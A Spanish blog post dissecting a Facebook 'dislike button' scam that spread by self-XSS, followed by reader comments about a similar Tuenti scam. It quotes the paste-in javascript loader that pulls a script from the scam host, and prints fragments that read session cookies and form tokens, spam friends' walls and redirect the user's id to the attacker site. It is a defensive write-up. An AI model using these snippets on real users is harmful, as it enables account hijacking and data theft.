Y hoy algo parecido, seguimos ante el mismo escenario, se prolifera el siguiente mensaje por los muros de tus amigos:
"Facebook now has a dislike button! Click 'Enable Dislike Button' to turn on the new feature! Currently enabled by 2,921,784 Users!"
La única diferencia de hoy es que esta vez han sido más "profesionales" y me parece digno de ser contado.
Como siempre, activo no-script, clicko en "Enable Dislike Button" y me aparece lo siguiente:
La típica página web que nos pide que copiemos el código javascript en la barra de direcciones para poder añadir el botón Dislike:
javascript:javascript:(a=(b=document).createElement('script')).src='//dislike.likex.me/button.js',b.body.appendChild(a);void(0)
Sorprendentemente cuando abro la dirección http://dislike.likex.me/button.js para ver cuál es el código fuente de button.js, me aparece lo siguiente:
¡Han "encriptado el código"!, ejecutan todo el código javascript con la siguiente función:
val(String.fromCharCode(...))
Don't panic! Tan fácil es encriptarlo como desencriptarlo, existen varias aplicaciones gratuitas para ello. Si queréis pegarle un ojo al código "desencriptado", lo he subido a un servidor, clickar aquí: http://serverf.260mb.com/js/dislike.js
Si analizamos el código podemos observar varias funciones y variables que nos hace sospechar que estamos otra vez ante una aplicación maliciosa:
var randomnumber=Math.floor(Math.random()*99999);
var user_id = readCookie("c_user");
var user_name = document.getElementById('navAccountName').innerHTML;...var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var friends = new Array();
gf = new XMLHttpRequest();
function readCookie(name) {...}...
Esta vez nos cogen datos hasta de nuestra cookie!Como siempre, crea una tabla donde almacena a todos nuestros amigos y les escribe a todos en su muro el mensaje que he nombrado anteriormente, todo eso sin nuestra autorización.Al final una hay alerta que nos redirecciona a una web para que ingresemos nuestro número de telefono:
alert("Account Verification Required To Enable The Dislike Button \n\ Please Press 'OK' To Verify Your Account.");
window.location = "http://dislike.likex.me/final.php?userid="+user_id+"&name="+user_name;Si entramos en dicha web nos aparece lo siguiente:
Nos dan 6 maravillosas oportunidades de saber cuál es nuestro coeficiente intelectual, saber cuanto nos parecemos a Cristiano Ronaldo, o... mejor aún, ganar vale de Vueling, un iPhone 4, una pantalla plana 3d o un mini-portatil... ¿Quién no se va arriesgar a insertar su número de teléfono pudiendo hacernos con estos chachi-premios? Obviamente, yo no.
Aquí os dejo las irresistibles ofertas:
¿En qué se basa su forma de negocio? Bajo mi punto de vista, pura probabilidad, de las millones de visitas que van a tener, seguro que alguien caerá en la trampa, sino mirar esto:
Si analizamos el tráfico por la página web vemos que ya ha pasado gente de casi todas las partes del mundo, además siempre hay alguien conectado. Cuestión de tiempo que algún fan del chulo-playa de Cristiano Ronaldo ingrese su número para saber cuál es su compatibilidad con el futbolista....
Otra cosa a comentar que me ha parecido curiosa es la letra pequeña de todas las páginas donde nos pedían que diéramos nuestro número, cada una era de una empresa distinta, así que supongo que los que han escrito este código malicioso será porque cobrarán de las diversas empresas que ofrecen esos servicios dependiendo del número de teléfonos obtenidos o del número de visitas.
¿Conclusión? La de siempre, no fiarse de las aplicaciones externas a facebook!
Saludos!
3 comentarios:
muy bueno rafa ;) por cierto hoy me ha pasado algo parecido en el tuenti. He recibido un mensaje de uno de mis contactos y ponía lo siguiente:
He obtenido en el cuestionario "¿Eres realmente una pija?" esta puntuación:
--
intentas ser pija, pero no lo consigues, aun te falta un poco.
6/10
--
Pruébalo tu también en: cuestionario. tk -> bit.ly/jKduFu
parece que este tipo de estafas ya se están incorporando poco a poco en todas las redes sociales ya que les resulta muy rentable. A ver que hacen las redes sociales para proteger a sus usuarios....
Gracias Suavi =)
Vaya, pues a mi todavía no me ha llegado nada en tuenti... Pero lo que faltaba, además de la abundante publicidad del propio tuenti, también spam de empresas. Al final vamos a tener que ver 2 minutos de publicidad para poder dejar un comentario en el tablón de nuestro amigo. jajaaja
Buff, y lo de que nos protejan ante este tipo de empresas, no sé cómo lo van a conseguir... Como no se creen una lista de los servidores que ellos consideren seguros y sólo nos dejen acceder a ellos desde tuenti si están en sus listas... no se me ocurre otra solución. Que piensen ellos y nos sorprendan! =P
@Suavi, ahora acabo de ver el evento que me has pasado, el de bit.ly/kUQuDs (el gusano de tuenti)
Parece ser que se lió una buena...
Publicar un comentario